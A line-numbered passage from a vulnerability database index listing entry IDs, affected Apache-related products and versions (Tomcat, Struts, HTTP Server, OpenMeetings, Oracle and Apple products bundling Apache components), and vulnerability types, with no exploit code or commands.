12512| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
12513| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
12514| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
12515| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
12516| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
12517| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
12518| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
12519| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
12520| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
12521| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
12522| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
12523| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
12524| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
12525| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
12526| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
12527| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
12528| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
12529| [103690] Apache OpenMeetings 1.0.0 sql injection
12530| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
12531| [103688] Apache OpenMeetings 1.0.0 weak encryption
12532| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
12533| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
12534| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
12535| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
12536| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
12537| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
12538| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
12539| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
12540| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
12541| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
12542| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
12543| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
12544| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
12545| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
12546| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
12547| [103352] Apache Solr Node weak authentication
12548| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
12549| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
12550| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
12551| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
12552| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
12553| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
12554| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
12555| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
12556| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
12557| [102536] Apache Ranger up to 0.6 Stored cross site scripting
12558| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
12559| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
12560| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
12561| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
12562| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
12563| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
12564| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
12565| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
12566| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
12567| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
12568| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
12569| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
12570| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
12571| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
12572| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
12573| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
12574| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
12575| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
12576| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
12577| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
12578| [99937] Apache Batik up to 1.8 privilege escalation
12579| [99936] Apache FOP up to 2.1 privilege escalation
12580| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
12581| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
12582| [99930] Apache Traffic Server up to 6.2.0 denial of service
12583| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
12584| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
12585| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
12586| [117569] Apache Hadoop up to 2.7.3 privilege escalation
12587| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
12588| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
12589| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
12590| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
12591| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
12592| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
12593| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
12594| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
12595| [99014] Apache Camel Jackson/JacksonXML privilege escalation
12596| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
12597| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
12598| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
12599| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
12600| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
12601| [98605] Apple macOS up to 10.12.3 Apache denial of service
12602| [98604] Apple macOS up to 10.12.3 Apache denial of service
12603| [98603] Apple macOS up to 10.12.3 Apache denial of service
12604| [98602] Apple macOS up to 10.12.3 Apache denial of service
12605| [98601] Apple macOS up to 10.12.3 Apache denial of service
12606| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
12607| [98405] Apache Hadoop up to 0.23.10 privilege escalation
12608| [98199] Apache Camel Validation XML External Entity
12609| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
12610| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
12611| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
12612| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
12613| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
12614| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
12615| [97081] Apache Tomcat HTTPS Request denial of service
12616| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
12617| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
12618| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
12619| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
12620| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
12621| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
12622| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
12623| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
12624| [95311] Apache Storm UI Daemon privilege escalation
12625| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
12626| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
12627| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
12628| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
12629| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
12630| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
12631| [94540] Apache Tika 1.9 tika-server File information disclosure
12632| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
12633| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
12634| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
12635| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
12636| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
12637| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
12638| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
12639| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
12640| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
12641| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
12642| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
12643| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
12644| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
12645| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
12646| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
12647| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
12648| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
12649| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
12650| [93532] Apache Commons Collections Library Java privilege escalation
12651| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
12652| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
12653| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
12654| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
12655| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
12656| [93098] Apache Commons FileUpload privilege escalation
12657| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
12658| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
12659| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
12660| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
12661| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
12662| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
12663| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
12664| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
12665| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
12666| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
12667| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
12668| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
12669| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
12670| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
12671| [92549] Apache Tomcat on Red Hat privilege escalation
12672| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
12673| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
12674| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
12675| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
12676| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
12677| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
12678| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
12679| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
12680| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
12681| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
12682| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
12683| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
12684| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
12685| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
12686| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
12687| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
12688| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
12689| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
12690| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
12691| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
12692| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
12693| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
12694| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
12695| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
12696| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
12697| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
12698| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
12699| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
12700| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
12701| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
12702| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
12703| [90385] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site scripting
12704| [90384] Apache Archiva up to 1.3.9 addProxyConnector_commit.action cross site request forgery
12705| [90383] Apache OpenOffice up to 4.1.2 Impress File memory corruption
12706| [89670] Apache Tomcat up to 8.5.4 CGI Servlet Environment Variable Open Redirect
12707| [89669] Apache HTTP Server up to 2.4.23 RFC 3875 Namespace Conflict Environment Variable Open Redirect
12708| [89726] Apple Mac OS X up to 10.11.5 apache_mod_php memory corruption
12709| [89484] Apache Qpid up to 0.13.0 on Windows Proton Library Certificate weak authentication
12710| [89473] HPE iMC PLAT/EAD/APM/iMC NTA/iMC BIMS/iMC UAM_TAM up to 7.2 Apache Commons Collections Library Command privilege escalation
12711| [90263] Apache Archiva Header denial of service
12712| [90262] Apache Archiva Deserialize privilege escalation
12713| [90261] Apache Archiva XML DTD Connection privilege escalation
12714| [88827] Apache Xerces-C++ up to 3.1.3 DTD Stack-Based memory corruption
12715| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
12716| [88608] Apache Struts up to 2.3.28.1/2.5.0 URLValidator Null Value denial of service
12717| [88607] Apache Struts up to 2.3.28.1 REST Plugin Expression privilege escalation
12718| [88606] Apache Struts up to 2.3.28.1 Restriction privilege escalation
12719| [88605] Apache Struts up to 2.3.28.1 Restriction privilege escalation
12720| [88604] Apache Struts up to 2.3.28.1 Token Validator cross site request forgery
12721| [88603] Apache Commons FileUpload up to 1.3.1 MultipartStream denial of service
12722| [88602] Apache Struts up to 1.3.10 ActionServlet.java cross site scripting
12723| [88601] Apache Struts up to 1.3.10 Multithreading ActionServlet.java memory corruption
12724| [88600] Apache Struts up to 1.3.10 MultiPageValidator privilege escalation
12725| [89005] Apache Qpid AMQP JMS Client getObject privilege escalation
12726| [87888] Apache Ranger up to 0.5.2 Policy Admin Tool eventTime sql injection
12727| [87835] Apache CloudStack up to 4.5.2.0/4.6.2.0/4.7.1.0/4.8.0.0 SAML-based Authentication privilege escalation
12728| [87806] HPE Discovery and Dependency Mapping Inventory up to 9.32 update 3 Apache Commons Collections Library privilege escalation
12729| [87805] HPE Universal CMDB up to 10.21 Apache Commons Collections Library privilege escalation
12730| [87768] Apache Shiro up to 1.2.4 Cipher Key privilege escalation
12731| [87765] Apache James Server 2.3.2 Command privilege escalation
12732| [88667] Apache HTTP Server up to 2.4.20 mod_http2 Certificate weak authentication
12733| [87718] Apache Struts up to 2.3.24.1 OGNL Caching denial of service
12734| [87717] Apache Struts up to 2.3.28 REST Plugin privilege escalation
12735| [87706] Apache Qpid Java up to 6.0.2 AMQP privilege escalation
12736| [87703] Apache Qbid Java up to 6.0.2 PlainSaslServer.java denial of service
12737| [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation
12738| [87700] Apache PDFbox up to 1.8.11/2.0.0 XML Parser PDF Document XML External Entity
12739| [87679] HP Release Control 9.13/9.20/9.21 Apache Commons Collections Library Java Object privilege escalation
12740| [87540] Apache Ambari up to 2.2.0 File Browser View information disclosure
12741| [87433] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
12742| [87432] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
12743| [87431] Apple Mac OS X up to 10.11.4 apache_mod_php Format String
12744| [87430] Apple Mac OS X up to 10.11.4 apache_mod_php denial of service
12745| [87429] Apple Mac OS X up to 10.11.4 apache_mod_php information disclosure
12746| [87428] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
12747| [87427] Apple Mac OS X up to 10.11.4 apache_mod_php memory corruption
12748| [87389] Apache Xerces C++ up to 3.1.3 XML Document DTDScanner.cpp memory corruption
12749| [87172] Adobe ColdFusion 11 Update 7/2016/up to 10 Update 18 Apache Commons Collections Library privilege escalation
12750| [87121] Apache Cordova iOS up to 3.x Plugin privilege escalation
12751| [87120] Apache Cordova iOS up to 3.x URL Whitelist privilege escalation
12752| [83806] HPE Network Node Manager i up to 10.01 Apache Commons Collections Library privilege escalation
12753| [83077] Apache Subversion up to 1.8.15/1.9.3 mod_authz_svn mod_authz_svn.c denial of service
12754| [83076] Apache Subversion up to 1.8.15/1.9.3 svnserve svnserve/cyrus_auth.c privilege escalation
12755| [82790] Apache Struts 2.0.0/2.3.24/2.3.28 Dynamic Method privilege escalation
12756| [82789] Apache Struts 2.0.0/2.3.24/2.3.28 XSLTResult privilege escalation
12757| [82725] HPE P9000 Command View up to 7.x/8.4.0 Apache Commons Collections Library privilege escalation
12758| [82444] Apache Camel up to 2.14.x/2.15.4/2.16.0 HTTP Request privilege escalation
12759| [82389] Apache Subversion up to 1.7.x/1.8.14/1.9.2 mod_dav_svn util.c memory corruption
12760| [82280] Apache Struts up to 1.7 JRE URLDecoder cross site scripting
12761| [82260] Apache OFBiz up to 12.04.05/13.07.02 Java Object privilege escalation
12762| [82259] Apache Qpid Proton up to 0.12.0 proton.reactor.Connector weak encryption
12763| [82250] Apache Ranger up to 0.5.0 Admin UI weak authentication
12764| [82214] Apache Wicket up to 1.5.14/6.21.x/7.1.x Input Element cross site scripting
12765| [82213] Apache Wicket up to 1.5.14/6.21.x/7.1.x ModalWindow Title getWindowOpenJavaScript cross site scripting
12766| [82212] Apache Ranger up to 0.5.0 Policy Admin Tool privilege escalation
12767| [82211] Apache OFBiz up to 12.04.06/13.07.02 ModelFormField.java DisplayEntityField.getDescription cross site scripting
12768| [82082] Apache JetSpeed up to 2.3.0 User Manager Service privilege escalation
12769| [82081] Apache OpenMeetings up to 3.1.0 SOAP API information disclosure
12770| [82080] Apache OpenMeetings up to 3.1.0 Event cross site scripting
12771| [82078] Apache OpenMeetings up to 3.1.0 Import/Export System Backup ZIP Archive directory traversal
12772| [82077] Apache OpenMeetings up to 3.1.0 Password Reset sendHashByUser privilege escalation
12773| [82076] Apache Ranger up to 0.5.1 privilege escalation
12774| [82075] Apache JetSpeed up to 2.3.0 Portal cross site scripting
12775| [82074] Apache JetSpeed up to 2.3.0 cross site scripting
12776| [82073] Apache JetSpeed up to 2.3.0 User Manager Service sql injection
12777| [82072] Apache JetSpeed up to 2.3.0 Portal Site Manager ZIP Archive directory traversal
12778| [82058] Apache LDAP Studio/Directory Studio up to 2.0.0-M9 CSV Export privilege escalation
12779| [82053] Apache Ranger up to 0.4.x Policy Admin Tool privilege escalation
12780| [82052] Apache Ranger up to 0.4.x Policy Admin Tool HTTP Request cross site scripting
12781| [81696] Apache ActiveMQ up to 5.13.1 HTTP Header privilege escalation
12782| [81695] Apache Xerces-C up to 3.1.2 internal/XMLReader.cpp memory corruption
12783| [81622] HPE Asset Manager 9.40/9.41/9.50 Apache Commons Collections Library Java Object privilege escalation
12784| [81406] HPE Service Manager up to 9.35 P3/9.41 P1 Apache Commons Collections Library Command privilege escalation
12785| [81405] HPE Operations Orchestration up to 10.50 Apache Commons Collections Library Command privilege escalation
12786| [81427] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
12787| [81426] Apple Mac OS X up to 10.11.3 apache_mod_php PNG File memory corruption
12788| [81372] Apache Struts up to 2.3.24.1 I18NInterceptor cross site scripting
12789| [81371] Apache Struts up to 2.3.24.1 Double OGNL Evaluation privilege escalation
12790| [81370] Apache Struts up to 2.3.24.1 Java URLDecoder cross site scripting
12791| [81084] Apache Tomcat 6.0/7.0/8.0/9.0 ServletContext directory traversal
12792| [81083] Apache Tomcat 7.0/8.0/9.0 Index Page cross site request forgery
12793| [81082] Apache Tomcat 7.0/8.0/9.0 ResourceLinkFactory.setGlobalContext privilege escalation
12794| [81081] Apache Tomcat 6.0/7.0/8.0/9.0 Error information disclosure
12795| [81080] Apache Tomcat 6.0/7.0/8.0/9.0 Session Persistence privilege escalation
12796| [81079] Apache Tomcat 6.0/7.0/8.0/9.0 StatusManagerServlet information disclosure
12797| [81078] Apache Tomcat 7.0/8.0/9.0 Session privilege escalation
12798| [80970] Apache Solr up to 5.3.0 Admin UI plugins.js cross site scripting
12799| [80969] Apache Solr up to 5.2 Schema schema-browser.js cross site scripting
12800| [80968] Apache Solr up to 5.0 analysis.js cross site scripting
12801| [80940] HP Continuous Delivery Automation 1.30 Apache Commons Collections Library privilege escalation
12802| [80823] Apache CloudStack up to 4.5.1 KVM Virtual Machine Migration privilege escalation
12803| [80822] Apache CloudStack up to 4.5.1 API Call information disclosure
12804| [80778] Apache Camel up to 2.15.4/2.16.0 camel-xstream privilege escalation
12805| [80750] HPE Operations Manager 8.x/9.0 on Windows Apache Commons Collections Library privilege escalation
12806| [80724] Apache Hive up to 1.2.1 Authorization Framework privilege escalation
12807| [80577] Oracle Secure Global Desktop 4.63/4.71/5.2 Apache HTTP Server denial of service
12808| [80165] Intel McAfee ePolicy Orchestrator up to 4.6.9/5.0.3/5.3.1 Apache Commons Collections Library privilege escalation
12809| [80116] Apache Subversion up to 1.9.2 svn Protocol libsvn_ra_svn/marshal.c read_string memory corruption
12810| [80115] Apache ActiveMQ up to 5.12.x Broker Service privilege escalation
12811| [80036] IBM Cognos Business Intelligence Apache Commons Collections Library InvokerTransformer privilege escalation
12812| [79873] VMware vCenter Operations/vRealize Orchestrator Apache Commons Collections Library Serialized Java Object privilege escalation
12813| [79840] Apache Cordova File Transfer Plugin up to 1.2.x on Android unknown vulnerability
12814| [79839] Apache TomEE Serialized Java Stream EjbObjectInputStream privilege escalation
12815| [79791] Cisco Products Apache Commons Collections Library privilege escalation
12816| [79539] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
12817| [79538] Apple Mac OS X up to 10.11.1 apache_mod_php memory corruption
12818| [79294] Apache Cordova-Android up to 3.6 BridgeSecret Random Generator weak encryption
12819| [79291] Apache Cordova-Android up to 4.0 Javascript Whitelist privilege escalation
12820| [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module SAML Response weak authentication
12821| [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation
12822| [78989] Apache Ambari up to 2.1.1 Open Redirect
12823| [78988] Apache Ambari up to 2.0.1/2.1.0 Password privilege escalation
12824| [78987] Apache Ambari up to 2.0.x cross site scripting
12825| [78986] Apache Ambari up to 2.0.x Proxy Endpoint api/v1/proxy privilege escalation
12826| [78780] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
12827| [78779] Apple Mac OS X up to 10.11.0 apache_mod_php denial of service
12828| [78778] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
12829| [78777] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
12830| [78776] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
12831| [78775] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
12832| [78774] Apple Mac OS X up to 10.11.0 apache_mod_php memory corruption
12833| [78297] Apache Commons Components HttpClient up to 4.3.5 HTTPS Timeout denial of service
12834| [77406] Apache Flex BlazeDS AMF Message XML External Entity
12835| [77429] Apache ActiveMQ up to 5.10.0 LDAPLoginModule privilege escalation
12836| [77399] Apache ActiveMQ up to 5.10.0 LDAPLoginModule weak authentication
12837| [77375] Apache Tapestry up to 5.3.5 Client-Side Object Storage privilege escalation
12838| [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal
12839| [77299] Apache Solr Real-Time Module up to 7.x-1.1 Index Content information disclosure
12840| [77247] Apache ActiveMQ up to 5.10 TransportConnection.java processControlCommand denial of service
12841| [77083] Apache Groovy up to 2.4.3 MethodClosure.java MethodClosure memory corruption
12842| [76953] Apache Subversion 1.7.0/1.8.0/1.8.10 svn_repos_trace_node_locations information disclosure
12843| [76952] Apache Subversion 1.7.0/1.8.0/1.8.10 mod_authz_svn anonymous/authenticated information disclosure
12844| [76567] Apache Struts 2.3.20 unknown vulnerability
12845| [76733] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 ap_some_auth_required unknown vulnerability
12846| [76732] Apache HTTP Server 2.4.7/2.4.8/2.4.9/2.4.10/2.4.12 Request apr_brigade_flatten privilege escalation
12847| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
12848| [75690] Apache Camel up to 2.13.3/2.14.1 XPathBuilder.java XML External Entity
12849| [75689] Apache Camel up to 2.13.3/2.14.1 XML Converter Setup XmlConverter.java SAXSource privilege escalation
12850| [75668] Apache Sling API/Sling Servlets Post up to 2.2.1 HtmlResponse cross site scripting
12851| [75601] Apache Jackrabbit up to 2.10.0 WebDAV Request XML External Entity
12852| [75420] Apache Tomcat up to 6.0.43/7.0.58/8.0.16 Security Manager privilege escalation
12853| [75145] Apache OpenOffice up to 4.1.1 HWP Filter Crash denial of service
12854| [75032] Apache Tomcat Connectors up to 1.2.40 mod_jk privilege escalation
12855| [75135] PHP 5.4/5.5 HTTP Request sapi_apache2.c apache2handler privilege escalation
12856| [74793] Apache Tomcat File Upload denial of service
12857| [74708] Apple MacOS X up to 10.10.2 Apache denial of service
12858| [74707] Apple MacOS X up to 10.10.2 Apache denial of service
12859| [74706] Apple MacOS X up to 10.10.2 Apache memory corruption
12860| [74705] Apple MacOS X up to 10.10.2 Apache denial of service
12861| [74704] Apple MacOS X up to 10.10.2 Apache denial of service
12862| [74703] Apple MacOS X up to 10.10.2 Apache denial of service
12863| [74702] Apple MacOS X up to 10.10.2 Apache denial of service
12864| [74701] Apple MacOS X up to 10.10.2 Apache cross site request forgery
12865| [74700] Apple MacOS X up to 10.10.2 Apache unknown vulnerability
12866| [74661] Apache Flex up to 4.14.0 asdoc index.html cross site scripting
12867| [74609] Apache Cassandra up to 1.2.19/2.0.13/2.1.3 JMX/RMI Interface privilege escalation
12868| [74469] Apache Xerces-C up to 7.0 internal/XMLReader.cpp denial of service
12869| [74468] Apache Batik up to 1.6 denial of service
12870| [74414] Apache Mod-gnutls up to 0.5.1 Authentication spoofing
